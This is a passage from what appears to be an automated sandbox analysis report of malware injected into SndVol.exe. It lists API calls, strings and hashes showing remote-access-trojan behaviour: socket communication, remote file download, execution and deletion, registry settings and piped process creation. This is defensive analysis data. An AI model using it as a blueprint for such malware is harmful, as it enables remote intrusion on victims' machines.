                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02924885
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0292488A
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924895
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 0292489A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658366068-0
                                                                                                                        • Opcode ID: 813f9a3d6f61524d4a11fbebf8f9c496c74ab08eca3db6cc4fb95f7634bb2305
                                                                                                                        • Instruction ID: b435e3d398b1b2338ff72b6552a1fa6f475291bf500aa795d371ab1fa1ca1818
                                                                                                                        • Opcode Fuzzy Hash: 813f9a3d6f61524d4a11fbebf8f9c496c74ab08eca3db6cc4fb95f7634bb2305
                                                                                                                        • Instruction Fuzzy Hash: FB214931444B549FCB216B66DC08A66FBE2EF40724B104E2DE2E602AB0CB72B855DF44

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0292CA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                        • API String ID: 82841172-425784914
                                                                                                                        • Opcode ID: be51e2e909e155667b7818ac81cb78793b0d6194243d0067c021da216ecfd71a
                                                                                                                        • Instruction ID: 293ebbbf98d77676e014d880ef9fd9a46d414e741223406c467736fbe2a64434
                                                                                                                        • Opcode Fuzzy Hash: be51e2e909e155667b7818ac81cb78793b0d6194243d0067c021da216ecfd71a
                                                                                                                        • Instruction Fuzzy Hash: 574168321042205BD718FB24DC51DBFB7A9AED0710F50092EF54B660E9EE709E5DCE56

Control-flow Graph: [graph image not captured]

APIs
  • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
  • Part of subcall function 02932513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
  • Part of subcall function 02932513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
  • Part of subcall function 02932513: RegCloseKey.KERNELBASE(?), ref: 0293255F
• StrToIntA.SHLWAPI(00000000,0298BC48,?,00000000,00000000,02994358,00000003,Exe,00000000,0000000E,00000000,0298556C,00000003,00000000), ref: 0293A4D9
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746
• Opcode ID: 04829e282e93547773dc796c467b405a5d9fa13ca12f0972e1670573641c7318
• Instruction ID: 8d4d4a1b5db89157396655d5692bc1f45b871de5080965b5c6b3a13362e15f4e
• Opcode Fuzzy Hash: 04829e282e93547773dc796c467b405a5d9fa13ca12f0972e1670573641c7318
• Instruction Fuzzy Hash: C2112F61A0021156D705B3A8DC7AD7F779FDBD0314F480428D546D31D1EA505D5B87A1

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• GetLocalTime.KERNEL32(?), ref: 02924946
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02924994
• CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 029249A7
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0292495C
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: f27042551e243eebdcf5d773ef03733ccd2d5cb37ac7da19f3554a411e7f34fd
• Instruction ID: 43cb294f6f0a4e985c03bb080374403b627acd03f6c04861ffa4949a0460668d
• Opcode Fuzzy Hash: f27042551e243eebdcf5d773ef03733ccd2d5cb37ac7da19f3554a411e7f34fd
• Instruction Fuzzy Hash: 8F1132319042B43ADB21FBBA8808BDBBF9CBF86764F04001AE01962145CBB4845CCFF2

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 029326E1
• RegSetValueExA.KERNELBASE(?,02986748,00000000,?,00000000,00000000,029942F8,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932709
• RegCloseKey.KERNELBASE(?,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932714
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 9fed2bd385151fd46d18d4e2dc720d233521d8bb7a6177d34de779f8efe199c8
• Instruction ID: 3659f85c95775ed972ce8c8af6704468774d854ed85e1358b33e2d6dcc136831
• Opcode Fuzzy Hash: 9fed2bd385151fd46d18d4e2dc720d233521d8bb7a6177d34de779f8efe199c8
• Instruction Fuzzy Hash: DFF03A72940118FBDB02AFA0EC55EFE776DEF44790F108615FD06A6150EB71AE18DAA0

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
• RegCloseKey.KERNELBASE(?), ref: 0293255F
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: e03b2dfa975768978691856dbe5dea4fb480c3d2ead68f958a4e9a974344bfa0
• Instruction ID: bcbad13a43870c6dacc5e8be99dbc834bb72fdb28b8a810f998e9d3106405724
• Opcode Fuzzy Hash: e03b2dfa975768978691856dbe5dea4fb480c3d2ead68f958a4e9a974344bfa0
• Instruction Fuzzy Hash: 07F0A476D40128BBDF219BA5DC48EEF7FBDEB44650F004465BA06E2100D7309F19DBA0

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 029324D7
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,029942F8), ref: 029324F5
• RegCloseKey.KERNELBASE(?), ref: 02932500
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: f3bd23508ced78e371868dd5b564a30468709a156c6d1f3ff4755cafd4873eab
• Instruction ID: 2ee61a05f13c9b4eaa727d474cbd9ed3e4c010a66764c39c2f4fdd54bc74bf5f
• Opcode Fuzzy Hash: f3bd23508ced78e371868dd5b564a30468709a156c6d1f3ff4755cafd4873eab
• Instruction Fuzzy Hash: EAF01776D40208BFDF119FE09C15FEEBBBCEB04744F1084A1FA05E6180E6709B18AB90

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0292B996,029860E0), ref: 02932485
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0292B996,029860E0), ref: 02932499
• RegCloseKey.KERNELBASE(?,?,?,0292B996,029860E0), ref: 029324A4
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: a0f4c4884ad49477732b3cf69436fc77fe92fdca95d4ed9e59a0fad714858513
• Instruction ID: d37dd5f83d106788e5530fa0fbf27ccf6269077cf134f04631e446e962cb7f89
• Opcode Fuzzy Hash: a0f4c4884ad49477732b3cf69436fc77fe92fdca95d4ed9e59a0fad714858513
• Instruction Fuzzy Hash: 0AE0ED71D45234FBDF325BE29C0DEEBBFACEF467A0B004454BD49A6201D2619E54E6E0

Control-flow Graph: [graph image not captured; legend: Executed / Not Executed]

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
• RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
• RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 8469bdc60660b6b3cdc59b5087b0a174abf1935ac58f44253ee35429d268c843
• Instruction ID: 899c44193f12882cb4c8efd43e03719aa3d1205c5df742777416a7b46606c316
• Opcode Fuzzy Hash: 8469bdc60660b6b3cdc59b5087b0a174abf1935ac58f44253ee35429d268c843
• Instruction Fuzzy Hash: 5AE03971A40208FBEF119FA09C06FEA7BACEB05B94F004460FA05E6180D2719E18ABA0
APIs
• _free.LIBCMT ref: 0296B9DF
  • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
• RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,02951FD7,00000000,0000000F,0294EA3D,?,?,02950AA6,?,00000000), ref: 0296BA1B
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0
• Opcode ID: 168c5a19a864b4cca40e538e2419fbd2884433279c7141e199205bc1fb012197
• Instruction ID: 9efbb4bfaedabafe76d2e67bc6cdf4e4117b3d6c2078a7b75c0404a28010972d
• Opcode Fuzzy Hash: 168c5a19a864b4cca40e538e2419fbd2884433279c7141e199205bc1fb012197
• Instruction Fuzzy Hash: 8BF0C232540511669B212A26DC1CB7B2BED9FC1BBCB140125E818FA180FF24C841C9A1
                                                                                                                        APIs
                                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 02924212
                                                                                                                          • Part of subcall function 02924262: WSAStartup.WS2_32(00000202,00000000), ref: 02924277
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02924252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1953588214-0
                                                                                                                        • Opcode ID: 4b2b1c943e953daf362b878fe958a1b8ee72cbc67e67f5ee47622ee435cdfe84
                                                                                                                        • Instruction ID: 230746d96b2b171f7bf978403d0bd3466eafee3c4091ec35ad7de65c474d3384
                                                                                                                        • Opcode Fuzzy Hash: 4b2b1c943e953daf362b878fe958a1b8ee72cbc67e67f5ee47622ee435cdfe84
                                                                                                                        • Instruction Fuzzy Hash: 61017C70848B909ED7358F39B4487A6BFE1AB19314F045E5EF1DA87B95C3B1A484CF10
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02953DE7
                                                                                                                          • Part of subcall function 02957BD7: RaiseException.KERNEL32(?,?,?,02953E09,00000000,00000000,?,?,?,?,?,?,02953E09,?,0298D5EC), ref: 02957C37
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02953E04
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3476068407-0
                                                                                                                        • Opcode ID: eb4d0d25aae0ac4b3acb806ba3e4638b5f050b829978a3748017b917e31b6858
                                                                                                                        • Instruction ID: 87bffcaca5513256aaba5f3c4748ccf4eac3f08c537c06916d59163f440dfd50
                                                                                                                        • Opcode Fuzzy Hash: eb4d0d25aae0ac4b3acb806ba3e4638b5f050b829978a3748017b917e31b6858
                                                                                                                        • Instruction Fuzzy Hash: D7F0B434A0021D76DB04F7B4E81999D77BD4E40394F5046B9BE24924E0EF70E609CBD8
                                                                                                                        APIs
                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,02991B28,02994358,00000000,02934240,00000000,00000001), ref: 02933FBC
                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02933FC1
                                                                                                                          • Part of subcall function 02933E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02933E86
                                                                                                                          • Part of subcall function 02933E37: LoadLibraryA.KERNEL32(?), ref: 02933EC8
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933EE8
                                                                                                                          • Part of subcall function 02933E37: FreeLibrary.KERNEL32(00000000), ref: 02933EEF
                                                                                                                          • Part of subcall function 02933E37: LoadLibraryA.KERNEL32(?), ref: 02933F27
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933F39
                                                                                                                          • Part of subcall function 02933E37: FreeLibrary.KERNEL32(00000000), ref: 02933F40
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,?), ref: 02933F4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1170566393-0
                                                                                                                        • Opcode ID: 5f51c907e42455692e03da57028c8c761c7f7a665e7057df7fcfa0e50ddd0011
                                                                                                                        • Instruction ID: 70de74e4ef595fa589664073c0eb38eb436c1b4e209f7f1d48d850f10f0d2bc2
                                                                                                                        • Opcode Fuzzy Hash: 5f51c907e42455692e03da57028c8c761c7f7a665e7057df7fcfa0e50ddd0011
                                                                                                                        • Instruction Fuzzy Hash: 4BD01772A851226BB322666DAC40EBBAAEDDFE6674B56046AB404D2100D6908C1686A9
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0292D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0298556C,00000003,00000000), ref: 0292BEE6
                                                                                                                        • GetLastError.KERNEL32 ref: 0292BEF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1925916568-0
                                                                                                                        • Opcode ID: e54169e71cb62bb5338b6a4110aff5b964261b4a18f0e46e6b9ac0cd51e3ee07
                                                                                                                        • Instruction ID: 70047106795df1afacdc93421da59929dfd13a2964ca63ac2a06edd0943e88a3
                                                                                                                        • Opcode Fuzzy Hash: e54169e71cb62bb5338b6a4110aff5b964261b4a18f0e46e6b9ac0cd51e3ee07
                                                                                                                        • Instruction Fuzzy Hash: 30D01270A883019BDB0817B8784A7793595AB94702F010919B10BC55C0DB6448645911
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 176396367-0
                                                                                                                        • Opcode ID: 59723d515f2dd5a4a67cde4aa9fac7a937e03c24c08970964ffa094e4c3d53ff
                                                                                                                        • Instruction ID: 5a62ac7c88e8a0428a892e7b280118597ac99bee17d532a5cdab011282926315
                                                                                                                        • Opcode Fuzzy Hash: 59723d515f2dd5a4a67cde4aa9fac7a937e03c24c08970964ffa094e4c3d53ff
                                                                                                                        • Instruction Fuzzy Hash: C911A5329002549FDB19EF64D890CEF7BB6AFA4310F10442EE81652295EF74AD2DCF90
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 42d1d6267a1cb8eb3626f541812ec717bb338d076b04a3a3ca64af0a5f033ffb
                                                                                                                        • Instruction ID: 8a7c1d841c1105c640572d3b26e485cbb7777420c2e79b205f203865ad97778d
                                                                                                                        • Opcode Fuzzy Hash: 42d1d6267a1cb8eb3626f541812ec717bb338d076b04a3a3ca64af0a5f033ffb
                                                                                                                        • Instruction Fuzzy Hash: 59E0653164D127E6EA212A79AC0CF7A7ACD9B817A4F0501299C19A6090DB58C80085A0
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 02924277
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: Startup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 724789610-0
                                                                                                                        • Opcode ID: 8c75244a0952b2f19a2ae634693223d65f1633180a31837bc365fa76c9ad75d3
                                                                                                                        • Instruction ID: d422b16750b1d1975c4d0f6a3a661eb1731b97ed5e10a5f1a061e5423be15330
                                                                                                                        • Opcode Fuzzy Hash: 8c75244a0952b2f19a2ae634693223d65f1633180a31837bc365fa76c9ad75d3
                                                                                                                        • Instruction Fuzzy Hash: C2D01332D9D6094ED51065F45C0F8F4775CD317711F0007755C75C26C2E540162CC2B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809346765-0
                                                                                                                        • Opcode ID: 99195489b495b2feac2d7c26b0c4f20aaa9489326f7ccecdb47095e55a04954b
                                                                                                                        • Instruction ID: 38259243aa076e65a4c79d1f5d3a56961e309e4784db6f56a6230932682abe51
                                                                                                                        • Opcode Fuzzy Hash: 99195489b495b2feac2d7c26b0c4f20aaa9489326f7ccecdb47095e55a04954b
                                                                                                                        • Instruction Fuzzy Hash: 8AB09B75508301FF8B051790C80487A7F7697C8340B004C1C754641130C5328454D731
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 02926F28
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 02926FF8
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 02927018
                                                                                                                          • Part of subcall function 0293B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B489
                                                                                                                          • Part of subcall function 0293B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B4BB
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B50C
                                                                                                                          • Part of subcall function 0293B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B561
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B568
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                          • Part of subcall function 02926BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,02985454,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C38
                                                                                                                          • Part of subcall function 02926BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C80
                                                                                                                          • Part of subcall function 02926BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,02927273,00000000,?,0000000A,00000000,00000000), ref: 02926CC0
                                                                                                                          • Part of subcall function 02926BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 02926CDD
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                          • Part of subcall function 02924468: WaitForSingleObject.KERNEL32(?,00000000,02921943,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000), ref: 0292450E
                                                                                                                          • Part of subcall function 02924468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000,?,?,?,?,?,02921943), ref: 0292453C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02927416
                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 029274F5
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0292773A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 029278CC
                                                                                                                          • Part of subcall function 02927A8C: __EH_prolog.LIBCMT ref: 02927A91
                                                                                                                          • Part of subcall function 02927A8C: FindFirstFileW.KERNEL32(00000000,?,02985AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B4A
                                                                                                                          • Part of subcall function 02927A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B6E
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 02927976
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 029279BA
                                                                                                                          • Part of subcall function 0293BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0293BC6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                        • API String ID: 2918587301-1507758755
                                                                                                                        • Opcode ID: 5dca4dc75fcb8dec8dc0e82165c2d62246b64c7b740fb832231912f22ab2408d
                                                                                                                        • Instruction ID: aad809210831f56356a71ba230ca164f8dc1bcac6f4c91ce1e32d287689ce6bc
                                                                                                                        • Opcode Fuzzy Hash: 5dca4dc75fcb8dec8dc0e82165c2d62246b64c7b740fb832231912f22ab2408d
                                                                                                                        • Instruction Fuzzy Hash: 3542B372A043609BCA18FB74DC659AFB7ABAFD0710F40091DE44A5719DEF609A1CCE93
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0292508E
                                                                                                                          • Part of subcall function 029534CF: EnterCriticalSection.KERNEL32(02990D18,02995BF0,?,029217C1,02995BF0,00000000), ref: 029534D9
                                                                                                                          • Part of subcall function 029534CF: LeaveCriticalSection.KERNEL32(02990D18,?,029217C1,02995BF0,00000000), ref: 0295350C
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 029250CB
                                                                                                                        • CreatePipe.KERNEL32(02995CEC,02995CD4,02995BF8,00000000,0298556C,00000000), ref: 0292515E
                                                                                                                        • CreatePipe.KERNEL32(02995CD8,02995CF4,02995BF8,00000000), ref: 02925174
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02995C08,02995CDC), ref: 029251E7
